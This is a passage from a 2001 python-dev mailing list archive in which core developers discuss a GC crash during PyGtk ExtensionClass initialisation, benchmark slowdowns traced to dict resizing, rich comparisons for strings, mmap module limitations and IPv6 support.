The actual object whose > bases tuple is being traversed is (in all the crashes I encountered), > GdkDragContext. The ordering of the registration calls could perhaps be > reordered. Currently GdkDragContext is patched up before GtkWidget, its > base class. This code is generated by James Henstridge's wrapper code > generator, so perhaps he can maintain the necessary class hierarchy > relationships and insure that base classes are initialized before their > subclasses. Wouldn't it be easier to simply set the ob_type fields right at the start of the initGtk() function ? This is what I do for all my extensions and I've never seen any problems with it. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From james at daa.com.au Thu May 17 09:18:23 2001 From: james at daa.com.au (James Henstridge) Date: Thu, 17 May 2001 15:18:23 +0800 (WST) Subject: [Python-Dev] Re: GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: <15107.29409.242342.200378@beluga.mojam.com> Message-ID: On Thu, 17 May 2001 skip at pobox.com wrote: > > Over the past couple days I've included python-dev on various messages in an > ongoing thread about a segmentation violation I was getting with the new > PyGtk2 wrappers. With some excellent assistance from the GC maestro, Neil > Schemenauer, I finally know what's going on and I have a simple workaround > that lets me get back to work. Here's a summary of the problem. > > When defining ExtensionClass types, you need to create and initialize a > PyExtensionClass struct. It looks something like so: > > PyExtensionClass PyGtkTreeSortable_Type = { > PyObject_HEAD_INIT(NULL) > 0, /* ob_size */ > "GtkTreeSortable", /* tp_name */ > sizeof(PyPureMixinObject), /* tp_basicsize */ > ... > }; > > Note that the parameter to the PyObject_HEAD_INIT macro is NULL. 
It would > normally be the address of a type object (e.g. &PyType_Type). However, Jim > Fulton pointed out that on Windows you can't get the address of &PyType_Type > object at compile time. Accordingly, ExtensionClass provides a > PyExtensionClass_Export macro whose responsibility is, in part, to set the > ob_type field appropriately at runtime. (I'm not sure why this Windows nit > doesn't afflict other type declarations like PyTuple_Type. I'm sure others > will know why. I just accept Jim's word as gospel and move on...) Well, for Extension Classes, PyType_Type is not correct either. And because ExtensionClass is loaded at runtime, we can't set the ob_type field in the initialiser even on Unix systems. > > A problem arises if the garbage collector runs while the module > initialization function is running, but before all the ob_type fields have > been assigned their correct values. In this case, a one-element tuple > representing the bases of a particular PyGtk extension class was traversed > by the garbage collector. > > The workaround turns out to be exceedingly simple: > > import gc > gc.disable() > import gtk > gc.enable() > > I can handle doing that from Python code for the time being and will leave > it up to others to decide how, if at all, ExtensionClass should be changed > to correct the problem. Thanks for debugging this problem Skip. If we don't find a correct solution to the problem, I can put the gc disable/enable calls inside the gtk/__init__.py module. James. From mal at lemburg.com Thu May 17 09:26:32 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 17 May 2001 09:26:32 +0200 Subject: [Python-Dev] Performance compares References: Message-ID: <3B037D27.E258C363@lemburg.com> Tim Peters wrote: > > [MAL] > > Since it is possible that these figures result from my specific > > machine setup, I'd like to know what other people see on their > > machines. 
>
> Is this the same machine where you were able to get 15% difference a few
> years ago by adding or removing an unreachable printf in ceval.c (or was that
> Vladimir)? If so, I bet it's degenerated to random 50% difference since then.

That must have been Vladimir's machine... even though I do admit that some small reordering changes do result in speedups of up to 10% -- probably due to the compiler accidentally creating code which the CPU's cache management likes.

> My Win98SE box is *astonishingly* useless for timings. Without fail, the
> first time I run pystone after a reboot yields a result a solid 50% higher
> than the second or subsequent times I run it (yes, it's major-league *slower*
> the second time). This is true across dozens of trials over several months,
> and across all versions of Python.

On Linux the situation is somewhat different; still I'm executing the tests 10 times each and for the figures I posted, I even ran pybench twice and only took the second readings as basis.

> And simple little loops routinely vary in reported runtime by a factor of 3.
> I may have to dig my old Win95 box out of the packing crate <0.6 wink>.
>
> None of that changes, of course, that the numbers you got are scary.

Sure are... but I'm not so much interested in the absolute numbers -- it's the hot-spots which showed up that scare me: e.g. dictionary creation seems to have suffered along the way for some reason, function calls are even slower now than they were previously and other important tasks such as instance creation take a similar hit (probably as a result of the other two).

Running the same test for 2.1 vs. 2.0 there's not much to notice, so the important changes seem to be originating in the move from 1.5.2 to 2.0.
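The measurement discipline discussed here (repeat each test, and distrust single readings because runs can vary wildly) can be captured with the standard `timeit` module by taking the minimum of several repeats. The sketch below is illustrative. The `best_of` helper is hypothetical, and the timed statement (building a small dict literal, loosely in the spirit of the DictCreation test) is only an example. One detail matters for the GC question: `timeit` turns off garbage collection while timing by default, so the optional setup code switches it back on to time with the collector active, which is closer to how applications run.

```python
import timeit

def best_of(stmt, setup="pass", repeat=5, number=100_000, with_gc=False):
    """Time `stmt` `repeat` times (each run executes it `number` times).

    Returns the fastest run in seconds. timeit switches the cyclic GC off
    while timing; with_gc=True switches it back on in the setup code.
    """
    if with_gc:
        setup = "import gc\ngc.enable()\n" + setup
    runs = timeit.repeat(stmt, setup=setup, repeat=repeat, number=number)
    # The minimum is the run least disturbed by other activity on the machine.
    return min(runs)

if __name__ == "__main__":
    stmt = "d = {'a': 1, 'b': 2, 'c': 3}"   # example statement only
    print("gc off: %.4f s" % best_of(stmt))
    print("gc on:  %.4f s" % best_of(stmt, with_gc=True))
```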
-- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From james at daa.com.au Thu May 17 09:33:17 2001 From: james at daa.com.au (James Henstridge) Date: Thu, 17 May 2001 15:33:17 +0800 (WST) Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: <00c101c0de9f$0a6c4d10$e46940d5@hagrid> Message-ID: On Thu, 17 May 2001, Fredrik Lundh wrote: > footnote: this is usually done in the module init function, *before* > the call to Py_InitModule. see: The PyExtensionClass_Export() function requires a pointer to the module dictionary so that it can add itself to the module. Unfortunately this requires that Py_InitModule to have been called before hand. I guess this means that the current ExtensionClass API will need to be modified in order to allow ExtensionClasses to be initialised before Py_InitModule. > > http://www.python.org/doc/FAQ.html#3.24 > > if the garbage collector can run after Python calls a module's init- > function, but before that module calls back into Python, anything > can happen... James. From mwh at python.net Thu May 17 09:43:38 2001 From: mwh at python.net (Michael Hudson) Date: 17 May 2001 08:43:38 +0100 Subject: [Python-Dev] Performance compares In-Reply-To: "M.-A. Lemburg"'s message of "Thu, 17 May 2001 09:26:32 +0200" References: <3B037D27.E258C363@lemburg.com> Message-ID: "M.-A. Lemburg" writes: > Sure are... but I'm not so much interested in the absolute numbers > -- it's the hot-spots which showed up that scare me: e.g. dictionary > creation seems to have suffered along the way for some reason, > functions calls are even slower now than they were previously and > other important tasks such a instance creation take a similar hit > (probably as a result of the other two). Have you tried fiddling with gc parameters? 
If the GC does a multi generation trawl through the heap in the middle of some test, that might skew the numbers in unexpected ways. Or not, of course. Cheers, M. -- CLiki pages can be edited by anybody at any time. Imagine the most fearsomely comprehensive legal disclaimer you have ever seen, and double it -- http://ww.telent.net/cliki/index From mal at lemburg.com Thu May 17 11:03:06 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 17 May 2001 11:03:06 +0200 Subject: [Python-Dev] Performance compares References: <3B037D27.E258C363@lemburg.com> Message-ID: <3B0393CA.7B0E024C@lemburg.com> Michael Hudson wrote: > > "M.-A. Lemburg" writes: > > > Sure are... but I'm not so much interested in the absolute numbers > > -- it's the hot-spots which showed up that scare me: e.g. dictionary > > creation seems to have suffered along the way for some reason, > > functions calls are even slower now than they were previously and > > other important tasks such a instance creation take a similar hit > > (probably as a result of the other two). > > Have you tried fiddling with gc parameters? If the GC does a multi > generation trawl through the heap in the middle of some test, that > might skew the numbers in unexpected ways. > > Or not, of course. No, I haven't tried fiddling with those. I'm not sure I want to either ;-) ... the reason is that applications won't switch off GC for execution and so the tests is closer to real life. Still, I'll rerun the test suite using gc.disable() and post the results. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Thu May 17 11:18:36 2001 From: mal at lemburg.com (M.-A. 
Lemburg) Date: Thu, 17 May 2001 11:18:36 +0200 Subject: [Python-Dev] Performance compares References: <3B037D27.E258C363@lemburg.com> <3B0393CA.7B0E024C@lemburg.com> Message-ID: <3B03976C.CF47961@lemburg.com> "M.-A. Lemburg" wrote: > > Michael Hudson wrote: > > > > "M.-A. Lemburg" writes: > > > > > Sure are... but I'm not so much interested in the absolute numbers > > > -- it's the hot-spots which showed up that scare me: e.g. dictionary > > > creation seems to have suffered along the way for some reason, > > > functions calls are even slower now than they were previously and > > > other important tasks such a instance creation take a similar hit > > > (probably as a result of the other two). > > > > Have you tried fiddling with gc parameters? If the GC does a multi > > generation trawl through the heap in the middle of some test, that > > might skew the numbers in unexpected ways. > > > > Or not, of course. > > No, I haven't tried fiddling with those. I'm not sure I want > to either ;-) ... the reason is that applications won't switch > off GC for execution and so the tests is closer to real life. > > Still, I'll rerun the test suite using gc.disable() and post the > results. Turns out, the difference is not noticeable (< 1%). -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From gmcm at hypernet.com Thu May 17 15:00:27 2001 From: gmcm at hypernet.com (Gordon McMillan) Date: Thu, 17 May 2001 09:00:27 -0400 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: <15107.29409.242342.200378@beluga.mojam.com> Message-ID: <3B03932B.8219.CCBF9F3F@localhost> [Skip] > Note that the parameter to the PyObject_HEAD_INIT macro is NULL. > It would normally be the address of a type object (e.g. > &PyType_Type).
However, Jim Fulton pointed out that on Windows > you can't get the address of &PyType_Type object at compile time. This is MS being passive-aggressive. If you tell MSVC the source is C++, it will magically find the address of PyType_Type at compile time, but their language lawyers apparently believe the C spec disallows this. Standards conformant and incompatible - what-MS-calls-"win-win"-ly y'rs - Gordon From guido at digicool.com Thu May 17 16:04:59 2001 From: guido at digicool.com (Guido van Rossum) Date: Thu, 17 May 2001 09:04:59 -0500 Subject: [Python-Dev] Comparison speed In-Reply-To: Your message of "Thu, 17 May 2001 08:12:18 +0200." <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de> References: <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de> Message-ID: <200105171405.JAA14836@cj20424-a.reston1.va.home.com> > I'd still be in favour of giving strings a richcompare, since it > allows to optimize what I think is the single most frequent case: > Py_EQ on strings. I have always thought that eventually (but long before Py3K!) all objects would only support rich comparisons and the __cmp__ and tp_compare slots would become completely obsolete. I realize I probably haven't expressed this thought clearly, and I'm not going to push for this to happen quickly or forcefully, but it's nevertheless how I see things. I expect it would allow a tremendous cleanup of the comparison code. It will never reach the simplicity of cmp() -- but think of Einstein's (?) rule "things should be as simple as they can be, but no simpler." Clearly cmp() was too simple. :-) Anyway, it worries me whenever I hear someone express the thought that adding rich comparisons to a particular object type would be a bad idea because it would slow things down.
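A world with only rich comparisons carries the cost Tim raised earlier in the thread: a three-way cmp() synthesized from rich comparisons may call the comparison slot up to three times. A small Python sketch that counts those calls makes this concrete. The class and function names are hypothetical, and the ==, <, > probing order is an assumption modelled on Tim's "from 1 thru 3 times" description, not a copy of CPython's code.

```python
class Counted:
    """Wraps a value and counts rich-comparison calls (for illustration)."""
    calls = 0

    def __init__(self, value):
        self.value = value

    def __eq__(self, other):
        Counted.calls += 1
        return self.value == other.value

    def __lt__(self, other):
        Counted.calls += 1
        return self.value < other.value

    def __gt__(self, other):
        Counted.calls += 1
        return self.value > other.value

def cmp_from_rich(a, b):
    """Three-way compare built only from ==, < and >."""
    if a == b:
        return 0
    if a < b:
        return -1
    if a > b:
        return 1
    raise TypeError("values are unordered")
```

Equal values cost one call, a smaller left operand costs two, and a larger one costs three, which is why code that calls cmp() on every node of a search tree can slow down once a type gains a richcmp slot.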
--Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Thu May 17 16:37:30 2001 From: guido at digicool.com (Guido van Rossum) Date: Thu, 17 May 2001 10:37:30 -0400 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: Your message of "Thu, 17 May 2001 09:00:27 EDT." <3B03932B.8219.CCBF9F3F@localhost> References: <3B03932B.8219.CCBF9F3F@localhost> Message-ID: <200105171437.f4HEbUB09503@odiug.digicool.com> > [Skip] > > > Note that the parameter to the PyObject_HEAD_INIT macro is NULL. > > It would normally be the address of a type object (e.g. > > &PyType_Type). However, Jim Fulton pointed out that on Windows > > you can't get the address of &PyType_Type object at compile time. > > This is MS being passive-aggressive. If you tell MSVC the > source is C++, it will magically find the address of > PyType_Type at compile time, but their language lawyers > apparently believe the C spec disallows this. Standards > conformant and incompatible - > > what-MS-calls-"win-win"-ly y'rs > > - Gordon I don't think MS blames it on the language spec so much; it's probably more that they use the spec as an excuse not to fix their implementation. The problem only occurs when the definition of the symbol is in a different DLL than the reference. This is why built-in types like PyTuple_Type don't have this problem. I guess for C++ they have to do a dynamic initializer anyway, so they can make this work, but they haven't bothered to make it work for C. My other point is that Skip's problem is clearly a gtk bug: it shouldn't have exposed the type before fully initializing it. 
--Guido van Rossum (home page: http://www.python.org/~guido/) From james at daa.com.au Thu May 17 16:48:43 2001 From: james at daa.com.au (James Henstridge) Date: Thu, 17 May 2001 22:48:43 +0800 (WST) Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: <200105171437.f4HEbUB09503@odiug.digicool.com> Message-ID: On Thu, 17 May 2001, Guido van Rossum wrote: > My other point is that Skip's problem is clearly a gtk bug: it > shouldn't have exposed the type before fully initializing it. On further investigation, it turned out that it was caused by a bug in my code generator that caused one extension class to be initialised before its base class (in fact, that particular extension class shouldn't have had any base classes). It was just the cyclic GC code triggering the bug. It will be fixed in the next snapshot of pygtk for GTK+ 2.0 James. -- Email: james at daa.com.au WWW: http://www.daa.com.au/~james/ From guido at digicool.com Thu May 17 16:52:54 2001 From: guido at digicool.com (Guido van Rossum) Date: Thu, 17 May 2001 10:52:54 -0400 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: Your message of "Thu, 17 May 2001 22:48:43 +0800." References: Message-ID: <200105171452.f4HEqse09691@odiug.digicool.com> > On further investigation, it turned out that it was caused by a bug in my > code generator that caused one extension class to be initialised before > its base class (in fact, that particular extension class shouldn't have > had any base classes). It was just the cyclic GC code triggering the bug. > > It will be fixed in the next snapshot of pygtk for GTK+ 2.0 Excellent news, James! I love the open source process! --Guido van Rossum (home page: http://www.python.org/~guido/) From barry at digicool.com Thu May 17 17:04:50 2001 From: barry at digicool.com (Barry A. 
Warsaw) Date: Thu, 17 May 2001 11:04:50 -0400 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround References: <200105171452.f4HEqse09691@odiug.digicool.com> Message-ID: <15107.59538.421007.37251@anthem.wooz.org> >>>>> "GvR" == Guido van Rossum writes: GvR> Excellent news, James! I love the open source process! No kidding! http://perens.com/Articles/StandTogether.html :) From Barrett at stsci.edu Thu May 17 16:56:49 2001 From: Barrett at stsci.edu (Paul Barrett) Date: Thu, 17 May 2001 10:56:49 -0400 Subject: [Python-Dev] mmap module Message-ID: <3B03E6B1.A19F6594@STScI.Edu> In the CVS log of the mmapmodule.c, Tim Peters says: "The code really needs to be rethought from scratch (not by me, though ...)." Well, I might be the person to do the rethinking, but I'd first like to know what Tim has in mind. I've been playing around with this module lately and tend to agree that some enhancements could be made, particularly to prevent "bus errors" and "segmentation faults". The ability to have offsets into a file that are not multiples of the system pagesize would also be nice. I'd be willing to submit a PEP on a new mmapmodule, once I know what others would like. -- Paul -- Paul Barrett, PhD Space Telescope Science Institute Phone: 410-338-4475 ESS/Science Software Group FAX: 410-338-4767 Baltimore, MD 21218 From tim.one at home.com Thu May 17 18:02:38 2001 From: tim.one at home.com (Tim Peters) Date: Thu, 17 May 2001 12:02:38 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105171405.JAA14836@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > I have always thought that eventually (but long before Py3K!) all > objects would only support rich comparisons and the __cmp__ and > tp_compare slots would become completely obsolete. I realize I > probably haven't expressed this thought clearly, and I'm not going to > push for this to happen quickly or forecefully, but it's nevertheless > how I see things. 
I expect it would allow a tremendous cleanup of the > comparison code. It will never reach the simplicity of cmp() -- but > think of Einstein's (?) rule "things should be as simple as they can > be, but no simpler." Clearly cmp() was too simple. :-) > > Anyway, it worries me whenever I hear someone express the thought that > adding rich comparisons to a particular object type would be a bad > idea because it would slow things down. At the moment, "almost all" comparisons in the dynamic sense have no need of richcmps, so clearly "Clearly cmp() was too simple. :-)" was too simple . For now richcmps are a tail-wagging-the-dog phenomenon, or more like the tail growing 10 pounds of dense matted hair, making the once-frisky puppy slow to a crawl because its butt is scraping the ground . Martin and I can resolve our differences wrt strings via getting rid of old strcmp entirely. Do you like the implications? 1. Code using cmp(string1, string2) will clearly run significantly slower, calling string comparison 1 (when == obtains), 2 (when < obtains), or 3 (when > obtains) times instead of always once only. Since == is the least likely outcome when using cmp() on strings (you can conclude that by instrumenting Python, or by common sense <0.5 wink>), the number of string compare calls more than doubles in practice for string cmp()-slinging programs (which includes existing well-written tree-based lookup schemes). 2. String dictionary lookup will, unlike the general non-dict case Martin instrumented, never pass the new "are the pointers the same?" richcmp Py_EQ test (because dict lookup already makes that test inline). So if old strcmp goes away, dict lookups that have to resort to strcmp will start paying for hopeless tests. OTOH, the "pointers equal?" test looks of dubious value for the non-dict string case anyway (where it succeeded only 1 in 20 times). 
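Point #2 relies on dict lookup testing key identity before it ever calls the comparison. That shortcut is still observable in modern CPython (an implementation detail, not a language guarantee). A minimal sketch, assuming a hypothetical `Key` class that counts its `__eq__` calls:

```python
class Key:
    """Hypothetical hashable key that counts how often __eq__ runs."""

    eq_calls = 0

    def __init__(self, text):
        self.text = text

    def __hash__(self):
        return hash(self.text)

    def __eq__(self, other):
        Key.eq_calls += 1
        return isinstance(other, Key) and self.text == other.text


def lookups():
    """Return (__eq__ calls for a same-object lookup, calls for an equal-but-distinct lookup)."""
    Key.eq_calls = 0
    k = Key("spam")
    d = {k: 1}
    d[k]  # same object: the inline identity test succeeds, __eq__ is skipped
    same_object = Key.eq_calls
    d[Key("spam")]  # equal but distinct object: lookup falls through to __eq__
    return same_object, Key.eq_calls - same_object
```

So a string that reaches a rich `Py_EQ` "are the pointers the same?" test from inside a dict lookup has already failed that very test inline.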
#2 is a special case that can be special-cased to death, but #1 likely applies to code using cmp() for comparisons of objects of any type, and that's the primary reason I've resisted adding richcmps to the heavily-compared types (variously string, int, float, long, and type objects). Also the case that adding "a fast path" shouldn't have to endure wading thru multiple gimmicks (kinda defeats the idea of "fast" ), so the instant *one* heavily-compared basic type grows a richcmp (there are 0 such today), all should. So that's what I'll aim at. From guido at digicool.com Thu May 17 20:18:27 2001 From: guido at digicool.com (Guido van Rossum) Date: Thu, 17 May 2001 14:18:27 -0400 Subject: [Python-Dev] IPv6 Message-ID: <200105171818.f4HIIRv12891@odiug.digicool.com> What's out IPv6 story? I recall that someone once sent me patches, but they didn't work for me. Is it time to try again? In certain circles IPv6 support in Python would be enough to switch programming languages... :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From martin at loewis.home.cs.tu-berlin.de Thu May 17 21:45:29 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Thu, 17 May 2001 21:45:29 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105171945.f4HJjTj01942@mira.informatik.hu-berlin.de> > 1. Code using cmp(string1, string2) will clearly run significantly > slower, calling string comparison 1 (when == obtains), 2 (when < > obtains), or 3 (when > obtains) times instead of always once only. I'd like to question the rationale behind this procedure. If a type has both tp_compare and tp_richcompare, and the application is performing cmp(o1, o2): Why is it then a good thing to emulate 3way compare using rich compare? 
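Tim's point #1 can be made concrete with a pure-Python model of emulating a 3-way `cmp()` through rich comparisons. `CountingStr` and `cmp_via_rich` are hypothetical names, and the ==, <, > probe order is an assumption chosen to reproduce the 1/2/3 call counts Tim cites:

```python
class CountingStr:
    """Hypothetical string wrapper with only rich comparisons; counts every call."""

    calls = 0

    def __init__(self, s):
        self.s = s

    def __eq__(self, other):
        CountingStr.calls += 1
        return self.s == other.s

    def __lt__(self, other):
        CountingStr.calls += 1
        return self.s < other.s

    def __gt__(self, other):
        CountingStr.calls += 1
        return self.s > other.s


def cmp_via_rich(a, b):
    """Emulate a 3-way compare by probing ==, then <, then >."""
    if a == b:
        return 0
    if a < b:
        return -1
    if a > b:
        return 1
    raise ValueError("operands are unordered")


def cost(x, y):
    """Return (3-way result, number of rich comparisons needed to get it)."""
    CountingStr.calls = 0
    result = cmp_via_rich(CountingStr(x), CountingStr(y))
    return result, CountingStr.calls
```

Equal operands cost one call, "less" costs two and "greater" costs three, whereas a native 3-way slot answers every case in one call. Since == is the least likely outcome when `cmp()` is used for ordering, most calls pay the higher price.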
I just changed the order in do_cmp, to the IMO more correct if (v->ob_type == w->ob_type && (f = v->ob_type->tp_compare) != NULL) return (*f)(v, w); c = try_rich_to_3way_compare(v, w); if (c < 2) return c; c = try_3way_compare(v, w); if (c < 2) return c; return default_3way_compare(v, w); With that, I got only a single failure in the test suite: test_userlist fails with exceptions.RuntimeError: UserList.__cmp__() is obsolete Tim thinks this is a bug in UserList, since __cmp__ is not obsolete; I agree. According to the CVS log, this implementation of do_cmp was installed in object.c 2.105, by gvanrossum, on 2001/01/17. What was the specific rationale for doing do_cmp in that order? Regards, Martin From tim at digicool.com Fri May 18 00:55:19 2001 From: tim at digicool.com (Tim Peters) Date: Thu, 17 May 2001 18:55:19 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) Message-ID: The worst percentage hit in both MAL's and Jeremy's pybench run was (here showing Jeremy's numbers, cuz I doubt anyone could reproduce MAL's ): DictCreation: 87.80 ms 2.93 us +115.72% Assorted things do not account for it: the new overhead of linking and unlinking dicts into the gc list (at creation and destruction times) seems to account for no more than 2%; and the overhead due to using the slower lookdict (as opposed to lookdict_string) even less. Jeremy cheated by running a profiler: the true cause is that dictresize gets called about twice as often. Before 2.1: *before* inserting an item, we checked to see whether the dict was at the resize point. If so, we resized it. Note that this meant PyDict_SetItem could grow a dict even if no new entry was made (and that this was the cause of several excruciating bugs in the 2.1 release cycle, since it meant a dict could get reshuffled merely when replacing the values associated with existing keys). 
2.1: *after* inserting an item, and if the key was new (i.e., the dict grew a new entry, as opposed to just replacing the value associated with an existing key), and the dict is at the resize point, we resize it. Now the DictCreation test overwhelmingly creates dicts of size exactly 3. The dict resizes from empty to capacity 4 on the way to gaining 2 entries. When adding the third: Before 2.1: 2 < (2/3)*4 == 2 2/3, so the dict is not resized and ends up remaining a capacity-4 dict with 3 slots full. This actually violates a documented dict invariant (i.e., that dicts are never more than 2/3rd full). 2.1: The third item added is a new item, and 3 > (2/3)*4 == 2 2/3, so we *do* resize it, and the dict ends up with 3 of 8 slots full. I've got no interest in trying to restore the old behavior. A compromise may be to boost the minimum size of a non-empty dict from 4 to 8. As is, the only non-empty dicts that can get away with using the current minimum size of 4 have no more than 2 elements. The question is whether such tiny non-empty dicts are common enough to make everyone else pay for "an extra" resize. go-ahead-just-*try*-to-prove-your-answer-ly y'rs - tim From skip at pobox.com Fri May 18 01:21:50 2001 From: skip at pobox.com (skip at pobox.com) Date: Thu, 17 May 2001 18:21:50 -0500 Subject: [Python-Dev] IPv6 In-Reply-To: <200105171818.f4HIIRv12891@odiug.digicool.com> References: <200105171818.f4HIIRv12891@odiug.digicool.com> Message-ID: <15108.23822.538016.564151@beluga.mojam.com> Guido> In certain circles IPv6 support in Python would be enough to Guido> switch programming languages... :-) Sounds like someone has caught the scent of world domination... 
;-) S From jeremy at digicool.com Thu May 17 20:39:07 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Thu, 17 May 2001 14:39:07 -0400 (EDT) Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: References: Message-ID: <15108.6859.810306.811326@slothrop.digicool.com> Another option is to change the benchmark to put one more item in the dict. Then the same number of resizes would occur with both versions of Python. Jeremy From tim.one at home.com Fri May 18 02:08:13 2001 From: tim.one at home.com (Tim Peters) Date: Thu, 17 May 2001 20:08:13 -0400 Subject: [Python-Dev] mmap module In-Reply-To: <3B03E6B1.A19F6594@STScI.Edu> Message-ID: [Paul Barrett] > In the CVS log of the mmapmodule.c, Tim Peters says: > > "The code really needs to be rethought from scratch (not by me, though > ...)." That was in specific reference to the code I changed, in mmap_find_method. The difficulty is that mmap is great for "large files", but the code before my change used a C int for the starting offset and also for the return value; I boosted those to a C long, which covers 63 bits on 64-bit Linux boxes, but doesn't help 64-bit Windows at all (where a C long remains 4 bytes). The mmap_object struct uses size_t to declare the relevant members, which is possibly better still than C long, but may still leave platform capabilities out of reach for large files (e.g., "even Win95" *allows* specifying 64-bit offsets when creating a mapped file view). C is a friggin' mess here, and Python's PyArg_ParseTuple() and Py_BuildValue() don't cater to the full range of C integral types anyway. In other words, if this code is ever to reach its full potential, it "really needs to be rethought from scratch". > Well, I might be the person to do the rethinking, but I'd first like > to know what Tim has in mind. Nothing that you did . 
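Paul Barrett's wish for file offsets that are not multiples of the page size can be worked around above the OS call: map from the aligned-down offset, then slice off the extra leading bytes. A minimal sketch against today's `mmap` module (its `offset` argument and `mmap.ALLOCATIONGRANULARITY` postdate this thread; `map_range` is a hypothetical helper):

```python
import mmap


def map_range(path, offset, length):
    """Return `length` bytes of the file at `path`, starting at an arbitrary `offset`.

    mmap.mmap() only accepts offsets that are multiples of
    mmap.ALLOCATIONGRANULARITY, so map from the aligned-down offset and
    slice away the leading bytes that were mapped only for alignment.
    """
    granularity = mmap.ALLOCATIONGRANULARITY
    aligned = offset - (offset % granularity)
    skip = offset - aligned
    with open(path, "rb") as f:
        with mmap.mmap(f.fileno(), skip + length,
                       access=mmap.ACCESS_READ, offset=aligned) as m:
            return m[skip:skip + length]
```

The granularity is the page size on most Unix systems but 64 KiB on Windows, which is one instance of the platform differences Tim warns about.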
> I've been playing around with this module lately and tend to agree > that some enhancements could be made, particularly to prevent "bus > errors" and "segmentation faults". When you get one of those, it's a bug in Python! > The ability to have offsets into a file that are not multiples of the > system pagesize would also be nice. It's OS-specific. Python should grow warts to protect against it on the OSes that care. > I'd be willing to submit a PEP on a new mmapmodule, once I know what > others would like. Hard to say. This has the potential to become Python's next thread subsystem, i.e. an endless and ultimately hopeless x-platform nightmare. If you do write a PEP, I vote to say that we'll cover Windows and Linux (and maybe Mac OS X?) out of the box, but any other platform is at your own risk (it doesn't really help if somebody pops up volunteering to support a minority platform, because they eventually go away, their code stops working, and it never gets fixed -- so it's use-at-your-own-risk in reality regardless). From tim.one at home.com Fri May 18 02:29:18 2001 From: tim.one at home.com (Tim Peters) Date: Thu, 17 May 2001 20:29:18 -0400 Subject: [Python-Dev] IPv6 In-Reply-To: <200105171818.f4HIIRv12891@odiug.digicool.com> Message-ID: [Guido van Rossum] > What's out IPv6 story? Ah! If that's version 6 of the Integer-Point alternative to Floating-Point, I've got it covered. Otherwise my guess is we have no story at all. > I recall that someone once sent me patches, but they didn't work for me. Try recompiling with -DLONG_BIT=33. > Is it time to try again? In certain circles IPv6 support in Python > would be enough to switch programming languages... :-) Floating-point is *that* bad?! 
ever-helpful-ly y'rs - tim From jeremy at digicool.com Fri May 18 00:16:15 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Thu, 17 May 2001 18:16:15 -0400 (EDT) Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: References: Message-ID: <15108.19887.534514.864376@slothrop.digicool.com> >>>>> "TP" == Tim Peters writes: TP> I've got no interest in trying to restore the old behavior. A TP> compromise may be to boost the minimum size of a non-empty dict TP> from 4 to 8. As is, the only non-empty dicts that can get away TP> with using the current minimum size of 4 have no more than 2 TP> elements. The question is whether such tiny non-empty dicts are TP> common enough to make everyone else pay for "an extra" resize. I also did a profile run on CreateInstances, which has a difference of +55.54% on my machine. It's basically the same story. The instance dictionary is getting resized more often with Python 2.1+ than it did with Python 1.5.2. I wouldn't be surprised if several more tests are showing a slowdown with the same cause. So boosting the minimum size sounds like a good thing. Jeremy From tim.one at home.com Fri May 18 05:26:52 2001 From: tim.one at home.com (Tim Peters) Date: Thu, 17 May 2001 23:26:52 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4 In-Reply-To: <005701c0dd38$2f417560$0900a8c0@spiff> Message-ID: [/F] > more info here: > > http://home.rica.net/alphae/419coal/index.htm > > "A Five Billion US$ (as of 1996, much more now) worldwide > Scam which has run since the early 1980's under Successive > Governments of Nigeria. > > "The Nigerian Scam is, according to published reports, the > Third to Fifth largest industry in Nigeria." 
Most interesting to me is that US Post Office is upset about this: http://www.usps.gov/websites/depart/inspect/pressrel.htm They don't seem to care so much that people are getting scammed, but that the letters mailed from Nigeria to advance the fee-extorting phase of the scam often use counterfeit postage! Where else but here http://www.usps.gov/websites/depart/inspect/metercap.htm could you learn that "Postage meters are not used in Nigeria -- therefore, all postage meter impressions on Nigerian mail are counterfeit!"? governments-are-mostly-insane-ly y'rs - tim From martin at loewis.home.cs.tu-berlin.de Fri May 18 06:45:21 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Fri, 18 May 2001 06:45:21 +0200 Subject: [Python-Dev] IPv6 References: Message-ID: <200105180445.f4I4jL101178@mira.informatik.hu-berlin.de> > What's out IPv6 story? I recall that someone once sent me patches, > but they didn't work for me. Is it time to try again? In certain > circles IPv6 support in Python would be enough to switch programming > languages... :-) It's still on SF, http://sourceforge.net/tracker/index.php?func=detail&aid=401196&group_id=5470&atid=305470 There are three problems with that patch, AFAICT: 1. It is too large for any individual to review in one chunk. 2. It gets quickly outdated. 3. It touches core aspects of the socket handling that are IMO better untouched. I 